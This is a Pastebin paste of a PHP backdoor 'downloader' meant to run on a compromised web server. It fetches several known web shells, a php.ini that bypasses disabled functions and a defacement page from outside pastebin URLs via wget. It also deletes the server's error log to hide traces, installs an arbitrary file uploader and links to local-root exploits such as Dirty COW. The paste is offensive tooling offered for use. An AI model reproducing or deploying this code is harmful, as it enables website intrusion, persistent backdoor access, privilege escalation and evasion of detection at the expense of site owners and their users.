Advertisement
ardann

[B3xd00r D0wnl04d3r]

Dec 28th, 2017
292
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.33 KB | None | 0 0
  1. <html>
  2. <head>
  3. <meta charset="UTF-8">
  4. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  5. <meta http-equiv="X-UA-Compatible" content="IE=edge">
  6. <meta name="author" content="B3XD00R">
  7. <meta name="url" content="http://pasangmata.co.id">
  8. <meta name="copyright" content="B3XD00R">
  9. <link rel="shortcut icon" href="http://suspend.kopiadem.com/images/favicon/favicon.ico">
  10. <title>~ B3xd00r D0wnl0ad3R~</title>
  11. <a href="https://www.exploit-db.com" target="_blank">Local Root Xploit</a></div>
  12. <br>
  13. <a href="https://github.com/FireFart/dirtycow/raw/master/dirty.c" target="_blank">Dirty COW Local Root Xploit</a></div>
  14. <br>
  15. <a href="https://root.bl33dz.me/" target="_blank">More Local Root Xploit ( Compiled & Noncompiled )</a></div>
  16. <br>
  17. </head>
  18. <body>
  19. <?php
  20. ################################################################
  21. # IndoXploit Shell Latest Version                              #    
  22. system("wget -O id.php https://pastebin.com/raw/5X50czZm");    #
  23. # Alfha Shell Latest Version (3.0)                             #
  24. system("wget -O al.php https://pastebin.com/raw/8uLAbGF4");    #
  25. # Berandal Shell Latest Version                                #
  26. system("wget -O br.php https://pastebin.com/raw/32BxBR49");    #
  27. # php.ini for bypassing disabled function                      #
  28. system("wget -O php.ini https://pastebin.com/raw/JScnubYR");   #
  29. # WSO Shell 2.5.1                                              #
  30. system("wget -O ws.php https://pastebin.com/raw/VSmX0B3Y");    #
  31. # Simple B3xd00r Latest Version by Gr370                       #
  32. system("wget -O cmd.php https://pastebin.com/raw/Z4ULBPnc");   #
  33. # SC Deface by Gr370                                           #  
  34. system("wget -O Gr370.html https://pastebin.com/raw/hwbvSwxN");#
  35. ################################################################
  36. # Removing error_log
  37. system("rm error_log");
  38. # Replace OLD script shell_dwn.php without downloading the Shell just Uploader! :D
  39. system("wget -O shell_dwn.php https://pastebin.com/raw/dtptbKQE");
  40. ###############################################################
  41. echo '<b>System:'.php_uname().'</b><br>';
  42. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader">';
  43. echo '<input type="file" name="file" size="50"><input name="Uploader" type="submit" value="UPLOAD!"></form>';
  44. if( $_POST['Uploader'] == "UPLOAD!" ) {
  45.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Successfully!</b>'; }
  46.     else { echo '<b>FAILED</b>'; }
  47. }
  48. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement